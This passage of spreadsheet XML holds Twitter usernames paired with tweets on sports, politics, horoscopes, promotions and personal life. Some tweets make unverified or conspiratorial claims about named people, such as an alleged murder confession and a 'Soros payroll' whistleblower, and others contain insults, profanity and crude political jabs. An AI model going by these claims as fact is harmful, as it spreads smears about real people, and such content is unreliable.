  <si>
    <t>Seahawk512</t>
  </si>
  <si>
    <t>A few min later I see him like struggling in the bushes with only shorts on, he must be wearing it under his long pants, he seemed ok, one of the residents went to check on him...ok that's the end of how the crack head beat me in a race haha</t>
  </si>
  <si>
    <t>DouglasAllen</t>
  </si>
  <si>
    <t>@joheartsart Braces oneself, prepares oneself... usually for bad news.</t>
  </si>
  <si>
    <t>DamienCarlisle</t>
  </si>
  <si>
    <t>@Orgelmesse @adamdavid85 @antihero_kate Reminder that Zoe Quinn claimed to have murdered a person https://t.co/JBXCpV2waQ https://t.co/VGAhNyASrM</t>
  </si>
  <si>
    <t>BobOicles</t>
  </si>
  <si>
    <t>@EmeraldAmerica1 Libs do it to my wife too who became naturalized citizen 30 years ago and she kept her paperwork private and secure to this day because it means so much to her and she is very proud of this country as well as our President...</t>
  </si>
  <si>
    <t>JeffGrant8898</t>
  </si>
  <si>
    <t>@MattPrehm @wayne87797047 Let’s go Pittman. Time to get busy.</t>
  </si>
  <si>
    <t>sheastonehouse</t>
  </si>
  <si>
    <t>@princessvirgohx Sometimes or I used to be or yes. Idk. Mercury Leo Mars Libra</t>
  </si>
  <si>
    <t>CarmenMiller8</t>
  </si>
  <si>
    <t>So good I had to share! Check out all the items I'm loving on @Poshmarkapp #poshmark #fashion #style #shopmycloset #flyingtomato #oldnavy #merona: https://t.co/ahjoW5Xi9W https://t.co/VxbJKLCPL1</t>
  </si>
  <si>
    <t>ColomboLMS</t>
  </si>
  <si>
    <t>@BenSFletcher “MEN” is a UNIVERSAL TERM used to mean “ALL PEOPLE.” The Founders did not literally mean “men only.” When will you people get it?</t>
  </si>
  <si>
    <t>killedbyn00dles</t>
  </si>
  <si>
    <t>Reins be charging in every time it's off cool down and sobbing for heals</t>
  </si>
  <si>
    <t>Gabino_Iglesias</t>
  </si>
  <si>
    <t>Budding writers? Emerging writers? Unpublished writers? Nonsense; there are writers and non-writers. That's it. If you write, you're a writer. If not writing is not an option, you're a writer. If writing comes before everything else, you're a writer. If that's you, keep writing.</t>
  </si>
  <si>
    <t>Okureya</t>
  </si>
  <si>
    <t>@PanderpZack despite the current 'discourse" that's been going around, it's a VERY wholesome and hurmours show</t>
  </si>
  <si>
    <t>nsfwnayeon</t>
  </si>
  <si>
    <t>Don’t know what I’m gonna do with my life when my brother graduates and isn’t playing high school sports anymore. I’m his biggest fan. I love going to his games. 🥺</t>
  </si>
  <si>
    <t>florazucena__</t>
  </si>
  <si>
    <t>Mad anxiety thinking about how im b doing this alone for awhile . 🤯😪</t>
  </si>
  <si>
    <t>PsychoCivilized</t>
  </si>
  <si>
    <t>@HeinrichH88_ @GandalftheWhi19 The word anarchy is used in the same context as anti semitism in this regard. The moment you start looking for alternatives to the state you're labeled an anarchist. But you knew that already you're just trying to get a reaction. Am I wrong @HeinrichH88_??</t>
  </si>
  <si>
    <t>JasmynWimbish</t>
  </si>
  <si>
    <t>BREAKING: I have donated my whole leg to Britney Griner for the remainder of this game this is not fair ohmygod</t>
  </si>
  <si>
    <t>D_Haught</t>
  </si>
  <si>
    <t>@AZvocate @mcaark @RobotPoet54 @mel_awesome @jedwards624 @ult_shapiro_fan @benshapiro You may not know this but it isn’t a binary decision between Green New Deal or We all burn and drown.</t>
  </si>
  <si>
    <t>hollywoodmed_</t>
  </si>
  <si>
    <t>The OFFICIAL Hollywood HOCO VIBES ‼️Yessir we JAMMING ALL HOMECOMING SZN!!!! 332 songs DOWNLOAD, LIKE, SHARE, RETWEET!!! #LUHC2k19 #HOCOSZN https://t.co/ErwKlA3rqY</t>
  </si>
  <si>
    <t>MaraphotoMara</t>
  </si>
  <si>
    <t>@FindlaterJake Absolutely! Go for a fresh lemon next.....</t>
  </si>
  <si>
    <t>maroonman1874</t>
  </si>
  <si>
    <t>@Queen_Ann1874 Hiding behind a pseudo Ann Budge account sweetheart and you're calling me an arsehole. Suck it up darling, the truth hurts.</t>
  </si>
  <si>
    <t>AC_Waterloo</t>
  </si>
  <si>
    <t>Checking out evolv1, Canada's first zero carbon and net-positive office building, at @DoorsOpenWR? Don't miss chatting with us in our TD Sustainable Future Lab about the Accelerator Centre &amp; our specialized cleantech programming 🌎🌿 https://t.co/OibOKF0jYj</t>
  </si>
  <si>
    <t>dianegracely</t>
  </si>
  <si>
    <t>UPDATE - another health update on me... I'm still not feeling well. Something is not right. My blood pressure has been elevated for over a week, which at first I thought was due to my chronic pain in my shoulder. NOPE cause... https://t.co/rG47IOpfuV</t>
  </si>
  <si>
    <t>thelawcourt</t>
  </si>
  <si>
    <t>Johnson ‘whipping up riot fears to avoid Brexit extension’ https://t.co/PgxunKDoMM</t>
  </si>
  <si>
    <t>Diva_Queen_Me</t>
  </si>
  <si>
    <t>Coordinating your inner and outer worlds is not an impossible ... More for Leo https://t.co/9bDmtfz2PP</t>
  </si>
  <si>
    <t>freshfaguette</t>
  </si>
  <si>
    <t>nobody wants to be friends with me, nobody wants to cuff me, nobody wants to fuck me!</t>
  </si>
  <si>
    <t>UOKLady</t>
  </si>
  <si>
    <t>Buy The Affirmation Lady books at 82 Petra Street Bicton, Wild Women Pop Up Shop! Open 9-5 today! wildwomensart . . #affirmations #books #fremantle #bicton #eastfremantle #sourhfremantle #perth #reading… https://t.co/l6iqAIsjTh</t>
  </si>
  <si>
    <t>zOkami_</t>
  </si>
  <si>
    <t>Live with the rare facecam stream😱 #Fortnite https://t.co/xVozI3jqXZ</t>
  </si>
  <si>
    <t>SolamenteNea</t>
  </si>
  <si>
    <t>@geo1de @FredTJoseph @DrTGIF FYI White people are not the only people that can be straight.</t>
  </si>
  <si>
    <t>BIGFINECHI</t>
  </si>
  <si>
    <t>Go follow @chanelb82413021 Get access to her OF for just $4 the next 15 subs 😋 and be giving 2 dropboxes when you subscribe Onlyfans: https://t.co/zYMHLWyxoS https://t.co/0AQt1BxKfL</t>
  </si>
  <si>
    <t>Afrixxan</t>
  </si>
  <si>
    <t>Creating the Seeds of Capitalism’s Death: Social Movements and Civil Society via /r/Anarchism https://t.co/MRI9hDiCx9</t>
  </si>
  <si>
    <t>AlexanderRivs</t>
  </si>
  <si>
    <t>@realDonaldTrump @johnlegend @LesterHoltNBC Profanity??? What about yours? This is what our children need to hear from their leader?? https://t.co/uZD7tfAgav</t>
  </si>
  <si>
    <t>JavonWoodsa</t>
  </si>
  <si>
    <t>EBOOK Download Free Courts and Criminal Justice in America (2nd Edition) &gt;&gt; https://t.co/Ej4Lgvctd7</t>
  </si>
  <si>
    <t>CompassionThin1</t>
  </si>
  <si>
    <t>Did you all hear that the fake whistleblower is on the George Soros payroll?</t>
  </si>
  <si>
    <t>haleyeberger</t>
  </si>
  <si>
    <t>Honestly some of you never watched Zenon, used catch phrases like zetus lapetus, running around pretending to be bffs with Raven Symone and it shows..</t>
  </si>
  <si>
    <t>TorrezDesrae</t>
  </si>
  <si>
    <t>@KevKombi Men justify rape because of the way a woman is dressed, there is no such thing as looking easy it’s either your easy or your not, your misogynistic views are the reason why women don’t feel safe walking the streets at night, shame on you.</t>
  </si>
  <si>
    <t>duggan_paul</t>
  </si>
  <si>
    <t>@Wittgenstein016 @Macid3000 @lisamariahoenig @The_Leaver @MattGeeSymonds @JTillx @Charlie_uk45 @caribou22 @ElContador2000 @El_Chele85 @Davidmetroland @GeoffKeey @Jag11814459 @KarlErik_Martin @twvasi @ShlomoIndiana @MattFingersArni @ActivistFTruth @David_Vaporium @CarolineHutt @Andywilds1 @NielsOckelmann @tolethorpe @dw2essex @brianbloop @Kitchy2016 @CharlieHicks90 @SirBorisJohnson @velocityblade @LittleDi70 @JohnRobertWho @european_kate @Tuskinhell @escapedBrexit @aoirann @baxter815 @mindedmusically @BrexitGone @JohnRya13591294 @ThatAndreCamara @ErikPlum @BrunoTheBridge @thegrimbarian @obsessedmuch1 @IanGianni @yorkshirefloss2 @Rotski @cockfield_paul @Bub26949855 @ajivorywriter not all coups are violent, even if most are. And parliament is not illegitimate, the proroguement was</t>
  </si>
  <si>
    <t>AlixAngelis</t>
  </si>
  <si>
    <t>Trying (and failing) to keep it together at @hollywoodshorts @FordTheatres screening of #BetweenthePines written and directed by @EmmaBell17! Thanks @hbo for supporting #femalefilmmakers!#FemaleFilmmakerFriday https://t.co/GvaVuGQijZ</t>
  </si>
  <si>
    <t>byseclan</t>
  </si>
  <si>
    <t>@BetoORourke Are you clueless that you don’t know the government shot the kids at Kent state? Seriously? The government, shot unarmed, defenseless students!!! You us to give our guns to the government? You’re a special kind of stupid!!!</t>
  </si>
  <si>
    <t>SonSheik</t>
  </si>
  <si>
    <t>@wittles85 Like=ack So true, it crushes the family left..</t>
  </si>
  <si>
    <t>chattingvet</t>
  </si>
  <si>
    <t>So trump is the one who called off the peace talks with the Taliban leaders. Wow so easy for an asshole whose only view of a battlefield was on a screen. All he did was weaken the country in the eyes of the Taliban. And with the Muslim countries they can claim a victory vs. USA.</t>
  </si>
  <si>
    <t>Im_ColdAF</t>
  </si>
  <si>
    <t>@RICKYANDOLINI Man i loved that Actor, rest his soul! He really turnt up in Johnny Tsunami too. Spliffs and a couple episodes Saturday morning?</t>
  </si>
  <si>
    <t>MrGregTowns</t>
  </si>
  <si>
    <t>@MarketWatch @retheauditors Great to see a white man finally catch a break.</t>
  </si>
  <si>
    <t>t_lands</t>
  </si>
  <si>
    <t>Commit to @CriticalRole tonight live? Or wait til monday?</t>
  </si>
  <si>
    <t>brokeboynickk</t>
  </si>
  <si>
    <t>why am i angry, then happy, and then i miss her?</t>
  </si>
  <si>
    <t>Olivia_Krelo</t>
  </si>
  <si>
    <t>oh my GOD someone HELP I’m addicted to TikTok</t>
  </si>
  <si>
    <t>aarxn82</t>
  </si>
  <si>
    <t>I can't just say "Oh I'm not racist!" and it's a done deal. I have to put in the work and constantly re-wire how society has spent hundreds of years raising. I have to be willing to understand the error I could possibly make. Even inadvertently. That's how humility works</t>
  </si>
  <si>
    <t>Tomco2017</t>
  </si>
  <si>
    <t>@CHIZMAGA @Ljflorence2 I have been doing that since the early 1980’s, they sucked then too.</t>
  </si>
  <si>
    <t>opechanga</t>
  </si>
  <si>
    <t>@DaZipstahh @JedediahBila He's always looked to opinions opposed to his thinking....</t>
  </si>
  <si>
    <t>UnlixGhost</t>
  </si>
  <si>
    <t>Does the Right/R look better than the FarLeft/FL? Imagine you're in public - the FL is a white guy punching you, wearing a furry suit, while flirting w/ a 9 yr old. The R is everyone else jerking off on the sidewalk saying, "...that dude is crazy."🍁 #WednesdayWisdom #centrist https://t.co/PO6bOOK0Ia</t>
  </si>
  <si>
    <t>HoustonChron</t>
  </si>
  <si>
    <t>Garth Brooks' return has fans flocking to iconic Texas dancehall https://t.co/CER49IQt1D</t>
  </si>
  <si>
    <t>tomhersz</t>
  </si>
  <si>
    <t>If you’re a Boomers fan, you have to be happy with this start as 🇫🇷 leads 23-10 over 🇱🇹. A reminder, if France wins, the Boomers are through to the quarterfinals with Monday’s game deciding who wins Group L. #FIBAWC</t>
  </si>
  <si>
    <t>cocothedalek</t>
  </si>
  <si>
    <t>@StrictScrutiny_ Would love to hear about the ACA case out of Texas - idk it it'll be at the court this term but it made the news and I want to understand it better!</t>
  </si>
  <si>
    <t>macbrunson</t>
  </si>
  <si>
    <t>Headlines “Market Hardly Moves After Fed Decision.” Another headline right next to the first one “Markets Jump On Fed Decision.” News Media wonders why the public has no trust or confidence in them. I’m better off without the news!</t>
  </si>
  <si>
    <t>corbieres99</t>
  </si>
  <si>
    <t>@melthornton5 @AtheistMayhem @BySpoke @Bobbynicholls1 And Yvette Cooper sent a message of support condemning it</t>
  </si>
  <si>
    <t>latrellb62</t>
  </si>
  <si>
    <t>2 people followed me and one person unfollowed me // automatically checked by https://t.co/wnn965pmk7</t>
  </si>
  <si>
    <t>Carliol1</t>
  </si>
  <si>
    <t>@BBCNews The term 'people/women of colour' was used in the Munchetty report. I am not attempting to be controversial or inflammatory in asking the question how is this different to, or any more acceptable than the non-pc term 'c******* people'?</t>
  </si>
  <si>
    <t>Jakujin</t>
  </si>
  <si>
    <t>@EPBeaumont I needed an historian to base around for Nazis. I think the biographical approach works for my purposes.</t>
  </si>
  <si>
    <t>HollyErinHudso1</t>
  </si>
  <si>
    <t>Check out what I just added to my closet on Poshmark: 🎃🕷️HALLOWEEN BUNDLE🕷️🎃. https://t.co/b2Xmv6CptS via @poshmarkapp #shopmycloset</t>
  </si>
  <si>
    <t>ouggi</t>
  </si>
  <si>
    <t>I am very impressed by Nuno, looking from the outside and the way that he shows himself in the media and the unity they have. They have a style they believe in and I like the way he operates."</t>
  </si>
  <si>
    <t>KAILACHARE</t>
  </si>
  <si>
    <t>I used to feel so weird about saying candid shit on my accounts bc of music and wanting to like stay on ~brand~ but honestly fuck y’all imma get these depression tweets offs bc that’s my process</t>
  </si>
  <si>
    <t>emilierxse</t>
  </si>
  <si>
    <t>right in the heart !</t>
  </si>
  <si>
    <t>Dragons4EverPod</t>
  </si>
  <si>
    <t>@s77tux @Eurekavideo @EyeOfJackieChan Did it come in the outer cardboard box or just as two single discs?</t>
  </si>
  <si>
    <t>liam_dearing</t>
  </si>
  <si>
    <t>@HumbersideSport The fans deserve a massive apology after that. What an absolute disgrace</t>
  </si>
  <si>
    <t>colelizabethh</t>
  </si>
  <si>
    <t>João (our exchange student) is going to his first homecoming. 🤗🤗🤗 https://t.co/e5k7bB0wPQ</t>
  </si>
  <si>
    <t>ColinStatter</t>
  </si>
  <si>
    <t>I just posted "How I price my paintings for Ebay" on Reddit https://t.co/fzJ9fqEh3q</t>
  </si>
  <si>
    <t>Lovepet19691</t>
  </si>
  <si>
    <t>AG William Barr demands end to nationwide injunctions empowering lone 'sympathetic' judges the magic word? Hardly any during OBAMA ! All we have left is courts to stop a delusional "chosen one" https://t.co/2NWFUkNdpU</t>
  </si>
  <si>
    <t>ChaudriIrfan</t>
  </si>
  <si>
    <t>@PTI_Gladiator Yup, when it comes to that, we have had our “moments”</t>
  </si>
  <si>
    <t>Shazzx</t>
  </si>
  <si>
    <t>Dismiss the myth about Africans not "Liking" Diasporic Africans. Its the first place 8ve been to where the immigration and custom officers and the natives said "Welcome Home" or "Caribu" https://t.co/Sdl3kFFplW</t>
  </si>
  <si>
    <t>divianne</t>
  </si>
  <si>
    <t>Obviously I had to commemorate it on twitter so I can look back (un)fondly on this day 😭</t>
  </si>
  <si>
    <t>BlastYourBook</t>
  </si>
  <si>
    <t>https://t.co/mZoByJsleR Most people do not value the importance of filing correctly or realize how much is at stake. 99cts #SocialSecurity https://t.co/uC47ClD2vN</t>
  </si>
  <si>
    <t>OhSweetCinna</t>
  </si>
  <si>
    <t>@IvankaTrump @StateIVLP @State_E @ECA_AS @AMBSHolliday Who are you and why are you there?</t>
  </si>
  <si>
    <t>CircuitMagazine</t>
  </si>
  <si>
    <t>Sen. Schumer Calls for Legislation Protecting Schools, Governments From Ransomware https://t.co/bV5kfLqMTi #school</t>
  </si>
  <si>
    <t>KarenKe29008987</t>
  </si>
  <si>
    <t>@ChuxTennis I will be at mass on Sunday morning! It will not be the same Med that we saw in Montreal. 🙏🏽</t>
  </si>
  <si>
    <t>BrySkyeGaming</t>
  </si>
  <si>
    <t>@OSWreview The really frustrating thing is the punishment of people that accept Content ID claims and having videos they can't monetise for themselves, whilst people that circumvent the system by using filters/carefully re-edited footage etc get away with it.</t>
  </si>
  <si>
    <t>Tucker_Jerbs</t>
  </si>
  <si>
    <t>@VixenRogue I’m jealous. I wish I could go back to not knowing who he was</t>
  </si>
  <si>
    <t>NikoGriggs</t>
  </si>
  <si>
    <t>@jksports This reminds me of when I used to watch sportscenter from 7AM to 11AM on repeat daily. Because it was the best show on TV.</t>
  </si>
  <si>
    <t>JeneaSavage</t>
  </si>
  <si>
    <t>What’s truly meant for you, few can deny. Of course, you must ... More for Sagittarius https://t.co/gjjwT427RL</t>
  </si>
  <si>
    <t>Hollyryan24Paul</t>
  </si>
  <si>
    <t>@colinpduncanao1 @mickde1967 @CelticBlog2018 Is Monday not the day they find out how much they actually owe Mike Ashley???</t>
  </si>
  <si>
    <t>587fm_</t>
  </si>
  <si>
    <t>Now playing All the Man That I Need by Whitney Houston!</t>
  </si>
  <si>
    <t>Latina4freedom</t>
  </si>
  <si>
    <t>@DJLugoff Absolutely! They were surprised how many voted 4 Trump in 2016, and will be more surprised in 2020</t>
  </si>
  <si>
    <t>OrionKidder</t>
  </si>
  <si>
    <t>@chadloder @kitzfuhel It’s the dog version of the upper-class twit of the year!</t>
  </si>
  <si>
    <t>zoyaroses</t>
  </si>
  <si>
    <t>daenerys-targaryen: so not a single woman won and the one man who did win had the last line of the series that revolved around brothels… https://t.co/zVNd7m1ji0</t>
  </si>
  <si>
    <t>RhymesR_Supreme</t>
  </si>
  <si>
    <t>I hit a lot of speed bumps and had to maneuver past road blocks but I'm still going. And that's the difference. I gotta remind myself this always. It really is a Marathon and I'm seeing how important that phrases really is. You have to internalize that energy fr. It ain't over🏁</t>
  </si>
  <si>
    <t>HobbitLtd</t>
  </si>
  <si>
    <t>Why not come and have tea with us in our Hobbit show house? We're dying to show you how lovely our Hobbit Houses are! https://t.co/rP4Ugy7LQp #hobbit #hobbithouse #gardenbuilding #RecycledPlastic https://t.co/8FawFenByI</t>
  </si>
  <si>
    <t>greenlight711</t>
  </si>
  <si>
    <t>@the_gardentarts @ThePheenster @U2 Same for me except it's my wife 😆 It's so sad cuz I always thought I had the ears of an eagle. Wrong!</t>
  </si>
  <si>
    <t>seanbennett618</t>
  </si>
  <si>
    <t>Las Vegas Females Not Afraid To Tell You That You Look Fine As Hell To Them...They Express That Shit 😂‼️</t>
  </si>
  <si>
    <t>wordpreneur</t>
  </si>
  <si>
    <t>The Real Problem With Your Indie Book https://t.co/fQwcKBEoDe</t>
  </si>
  <si>
    <t>RedmondMichelle</t>
  </si>
  <si>
    <t>@sqrlb8 I literally said that to someone I live with this very morning. You have ESP too? 😲</t>
  </si>
  <si>
    <t>GrahamLScott</t>
  </si>
  <si>
    <t>@jessphillips @luke_trainor I work 7 days a week, have 2 jobs and still find time to cook for my family. Whinging freeloader.</t>
  </si>
  <si>
    <t>gelikuh89</t>
  </si>
  <si>
    <t>Happy birthday to one of my faves @TheRealMattKemp https://t.co/n50sLFIyD7</t>
  </si>
  <si>
    <t>paulmsmith1975</t>
  </si>
  <si>
    <t>CNBC: Review: Fitbit's new $200 watch does the basics, but feels way behind the Apple Watch. https://t.co/HIz1f35Zc9</t>
  </si>
  <si>
    <t>TimmyPotter7</t>
  </si>
  <si>
    <t>@Charlestonion And too you as well.</t>
  </si>
  <si>
    <t>lulbaddie600</t>
  </si>
  <si>
    <t>Gotta change the scenery on myself soon</t>
  </si>
  <si>
    <t>rightonQuelive</t>
  </si>
  <si>
    <t>This is just the FIRST edition of #ScreenshotTakes for #WeAreLive S/O to everybody for their feedback, there’s more in my story ⬆️ &amp; more dropping later in the week... in the meantime go stream the album, link in the… https://t.co/V7GPjRAOiC</t>
  </si>
  <si>
    <t>PigsEarsWEST</t>
  </si>
  <si>
    <t>Right you lot! Tonight lists feature @kirkstallbrew @VerdantBrew cask (omfg!) @Odysseybrewco @amundsenbrewery @burningskybeer CIDER SAISON @lostandgrounded mega lager! @NewBristol @WildeChildBeer and many many more!! Lists at 4! #craftnotcrap #CraftBeer #realale</t>
  </si>
  <si>
    <t>SigmaJump</t>
  </si>
  <si>
    <t>Shipped off the Joycons for repair, and stopped by the bookstore. I guess today is trying to get a start on Roberto, and the eurobeat cover... I guess I'll work on the music first...?</t>
  </si>
  <si>
    <t>@artpopvenice, thanks. Stay tuned. We’ll send a reminder before the #AppleEvent on 10 September at 10:30 pm IST. Reply #unsubscribe to opt out. https://t.co/vCC4GflkC9</t>
  </si>
  <si>
    <t>Search_Pal</t>
  </si>
  <si>
    <t>Hey, check out this cool site I found: https://t.co/fVv7s2mQpj Searchpal blocks inappropriate websites, offensive content and harmful traffic that can slip through in other search engines even when “clean” search terms are entered.</t>
  </si>
  <si>
    <t>hedder40</t>
  </si>
  <si>
    <t>@Sportsnet650 Maybe @imacSportsnet should have listen to the long interview Brock’s agent had on this same station. It was basically the opposite of everything Iain said. Sorry but I know who I’d believe.</t>
  </si>
  <si>
    <t>MyGuyXenny</t>
  </si>
  <si>
    <t>@cherrizard The Aang Mii Brawler is killing me</t>
  </si>
  <si>
    <t>DjJWattsLive</t>
  </si>
  <si>
    <t>#CD DUPLICATION #Specials 500 Cds &amp; Inserts $295 All Packages include Shipping and Handling https://t.co/B5n55SHr6A https://t.co/OyaEewnSfX</t>
  </si>
  <si>
    <t>SixthFlrMuseum</t>
  </si>
  <si>
    <t>#OTD 55 years ago, the Warren Commission delivered its report to President . Johnson. Do you agree with the findings? Watch this 2013 program featuring members of the Warren Commission and see if it changes your opinion. https://t.co/HxaYUpY2jM</t>
  </si>
  <si>
    <t>CJWartley</t>
  </si>
  <si>
    <t>conversations (feat. Pineapple) - Single by ElixThaMC. Recorded and Mastered by #CJWartley on iTunes https://t.co/WvwzxAkyOJ https://t.co/9Pm7Fc1C0o</t>
  </si>
  <si>
    <t>selmahaas</t>
  </si>
  <si>
    <t>💚 Winter has us longing for bikinis, more and more bikinis (36 Photos) https://t.co/OEbASVwoDE</t>
  </si>
  <si>
    <t>PilotJonees</t>
  </si>
  <si>
    <t>Your intuition and rational precision work together in harmony... More for Libra https://t.co/sLv7bUadfb</t>
  </si>
  <si>
    <t>GodJesusHS</t>
  </si>
  <si>
    <t>@HLAurora63 Shame Shame Shame. This has to stop</t>
  </si>
  <si>
    <t>gomez_j13</t>
  </si>
  <si>
    <t>Just for today that’s all I ask 🙏🏽</t>
  </si>
  <si>
    <t>bulletsandsteel</t>
  </si>
  <si>
    <t>Learned today that Sig V-Crown hollowpoints don’t feed well into my Kimber 10mm. Consensus is the chamber is “too tight.” That’s what he said. https://t.co/h8vTxOJvAP</t>
  </si>
  <si>
    <t>joshp_j</t>
  </si>
  <si>
    <t>@davidannesley My absolute pleasure. Great to have you on board. Looking forward to teaching together next time, when I’m not about to get married</t>
  </si>
  <si>
    <t>ericahomeschool</t>
  </si>
  <si>
    <t>My 8th grade #homeschool curriculum 📚 picks are live! Stop by my blog for details! Link ☝🏻 #8thgrade #curriculum #history #math #science #writing #english #bible #spelling https://t.co/YEcI2zvD1v</t>
  </si>
  <si>
    <t>kyliewc__</t>
  </si>
  <si>
    <t>thank God BLS taught me how to be a professional bullshitter lol</t>
  </si>
  <si>
    <t>katiejrealty</t>
  </si>
  <si>
    <t>Plenty of counter space, plenty of cupboards, and cool brick walls; this kitchen is all-around great! The best part is the seamless merging of styles and materials. Cheers, Katie Johnson, REALTOR RE/MAX Insight https://t.co/6FTXC2kTgU https://t.co/7qPVzMDF1L https://t.co/cqfTFnUdTt</t>
  </si>
  <si>
    <t>Q_dog</t>
  </si>
  <si>
    <t>Head to https://t.co/vSmGiABvYO and find out! Also please check out my professional Instagram page at davidquinnyquinn and give it a follow! https://t.co/7Dep5YkWlw</t>
  </si>
  <si>
    <t>dbjxtnf</t>
  </si>
  <si>
    <t>Tomorrow going to be hot asab for no reason</t>
  </si>
  <si>
    <t>gaveupcoffee</t>
  </si>
  <si>
    <t>@RepDougCollins @realDonaldTrump Where are the indictments?</t>
  </si>
  <si>
    <t>celarson8</t>
  </si>
  <si>
    <t>@wilkening @roseclear What about, and hear me out here, bacon cookies?</t>
  </si>
  <si>
    <t>SpiritAirlines</t>
  </si>
  <si>
    <t>@CalRiviello For privacy purposes, please send us a Direct Message - we'll be glad to help.</t>
  </si>
  <si>
    <t>@alihashemi2002, thanks. Stay tuned. We'll send a reminder before the #AppleEvent on September 10, at 10 a.m. PDT. Reply #stop to opt out. https://t.co/j3tx6w17xJ</t>
  </si>
  <si>
    <t>GordyPls</t>
  </si>
  <si>
    <t>@kels_316 I used to be a little bit worried that violent dystopias were even possible, now I'm horrified at the idea we live in a world where people beat people to death for being female or trans or just there already. All that's left is to monetise it and rationalise it.</t>
  </si>
  <si>
    <t>ShazzleRazzle</t>
  </si>
  <si>
    <t>@NickyStix55 Nicky I can't believe what you've been subjected to. Hopefully these nasty idiots get their comeuppance. My thoughts and prayers are with you. 😙</t>
  </si>
  <si>
    <t>DavidVarkonyi</t>
  </si>
  <si>
    <t>@TicketmasterUK @O2ApolloManc Most disgusting thing ever ! Using a person ‘s name who died 7 years ago to get people to pay £50-60 for this ridiculous thing! Appalling!</t>
  </si>
  <si>
    <t>onewayjack93</t>
  </si>
  <si>
    <t>I’m terrible I’m in a corporate meeting and I just told these ppl I don’t even eat little Caesar’s 😂😂</t>
  </si>
  <si>
    <t>nursingdean</t>
  </si>
  <si>
    <t>@NolanOnNursing @JHUNursing @MonaShattell Fabulous individuals set to change the future #DeanProud</t>
  </si>
  <si>
    <t>ty_ty92</t>
  </si>
  <si>
    <t>I hope that @bbceurovision &amp; @BMGuk select The pop band The Chawners to represent the UK in 2020 it’s about time the UK sent something current and cool to #Eurovision https://t.co/ufymLBQZy7</t>
  </si>
  <si>
    <t>Hapjamlaw</t>
  </si>
  <si>
    <t>Eric Trump's Attempt to Discredit the Washington Post, Jeff Bezos Backfired - Newsweek https://t.co/Oq8ZUaaYum</t>
  </si>
  <si>
    <t>JohnGre72212963</t>
  </si>
  <si>
    <t>@RealNativeTaino @Alyssa_Milano @realDonaldTrump Over a million deaths each year to cigarettes but let's go after guns first, so much easier to go after something protected in the constitution, smh. Not saying they shouldn't but which one kills more 2nd hand included???</t>
  </si>
  <si>
    <t>SalviSalvi2000</t>
  </si>
  <si>
    <t>UP biker fined for not wearing ‘seat belt in Bihar’ https://t.co/8W84t9HGjV via @timesofindia UP has become a amusement park in recent years.</t>
  </si>
  <si>
    <t>cwhitfi7</t>
  </si>
  <si>
    <t>@Patrick_J_OShea Bet they were rushing to get there before they ran out of chicken sandwiches...</t>
  </si>
  <si>
    <t>KelWoolsey</t>
  </si>
  <si>
    <t>@RKSAlberta @According2Luke @edwinmundt @HandmaidAlberta Maybe if I would not use the word "fuck" as commonly as "and" I could get on the news. :-)</t>
  </si>
  <si>
    <t>warnoj</t>
  </si>
  <si>
    <t>Blessed to teach with this superhero! #teacherlife #betterwithfriends https://t.co/RjnuYI0Kdh</t>
  </si>
  <si>
    <t>AndrewGuilford</t>
  </si>
  <si>
    <t>Jean-Claude Juncker criticises his successor’s decision to appoint a “commissioner for protecting our European way of life” to set immigration policy https://t.co/PZ1qdWvoYI</t>
  </si>
  <si>
    <t>iammab</t>
  </si>
  <si>
    <t>@BlynkFn Hey! Listen to my New Album HIGH ON LOVE &amp; Enjoy! https://t.co/x4R4jwyjfs</t>
  </si>
  <si>
    <t>whiteXblackrose</t>
  </si>
  <si>
    <t>@UnreadDatum 👏 I hope it all turns out great for you.</t>
  </si>
  <si>
    <t>isaiahhess</t>
  </si>
  <si>
    <t>When church “tradition” and the Bible conflict or disagree (as they often do), what is one to do to resolve the conflict? If one truly believes and practices the doctrine that the Bible is the very Word of God,... https://t.co/gb3Zw4XBqK</t>
  </si>
  <si>
    <t>_BrandonNelson</t>
  </si>
  <si>
    <t>@bballMurphy23 They got the women’s team order by mistake. 😂🤣🤣🤣😂🤣</t>
  </si>
  <si>
    <t>angelafritz</t>
  </si>
  <si>
    <t>@bungiehelp The bug where you can't create a mote with your synths no matter how many times you hold down "apply" is back in full force. Literally cannot generate a mote to save my Titan life rn.</t>
  </si>
  <si>
    <t>GregMannarino</t>
  </si>
  <si>
    <t>Lions a GRAND SLAM day for the QUANT system.. absolutely nailed it. I hope you got in...</t>
  </si>
  <si>
    <t>Calloutfortruth</t>
  </si>
  <si>
    <t>Russia Says It Will Keep Source of Hole (and Air Leak) on Soyuz Secret— But NASA Wants to Know https://t.co/MEfklVBoBo</t>
  </si>
  <si>
    <t>tracy_messina</t>
  </si>
  <si>
    <t>@realDonaldTrump She must have got under your skin really bad . Good for her</t>
  </si>
  <si>
    <t>Christi22636931</t>
  </si>
  <si>
    <t>@realDonaldTrump GOP GETS PAID BIG BUCKS FOR LOYALTY.</t>
  </si>
  <si>
    <t>coolhill</t>
  </si>
  <si>
    <t>@meandmybigmouth Oh my god. How many ribs? How much stock? Balance of ingredients and recipe please!</t>
  </si>
  <si>
    <t>PURPICIDE</t>
  </si>
  <si>
    <t>so what happens when AFX plays your track? do you grow wings and spit fire or attain the ability to stop time or teleport? just wondering because it seems like a lot of people place holy weight on a DJ set...and ...then what? (Asking for a friend)</t>
  </si>
  <si>
    <t>sophiegracesx</t>
  </si>
  <si>
    <t>or way older men need to stop chatting to underage girls because it’s nonce behaviour? blame the girl tho yhhhhh https://t.co/QyfUTx8gOW</t>
  </si>
  <si>
    <t>MagnifiSys</t>
  </si>
  <si>
    <t>The powerful new #iPhone11 is now available to be ordered as of today, September 13, 2019. https://t.co/GqoieUP08R What is your mobile phone operating system preference? #android #iOS #phonewars #mobile #smartphones</t>
  </si>
  <si>
    <t>NSR_Media</t>
  </si>
  <si>
    <t>Tune into #ThSpin weekdays from 4-7pm. @BarryDavis_, @MichelleSturino, and @Matt_NSR talk music, sports, entertainment, and much more. Traffic reports on the 5's. Listen live on @sauga960am or stream live at https://t.co/geM4j7ZYDo https://t.co/bSWnZG0G5V</t>
  </si>
  <si>
    <t>1984winssmith</t>
  </si>
  <si>
    <t>@realDonaldTrump @realDonaldTrump You are a pathological liar which makes fact-based news the enemy right? You are the fake news. SHOW US YOUR TAX RETURNS!</t>
  </si>
  <si>
    <t>Tim_Pettit_</t>
  </si>
  <si>
    <t>@Bill_Morneau Forward for who, Bill? The corporate elite of Quebec? Not Alberta. Not our kids.</t>
  </si>
  <si>
    <t>xssfox</t>
  </si>
  <si>
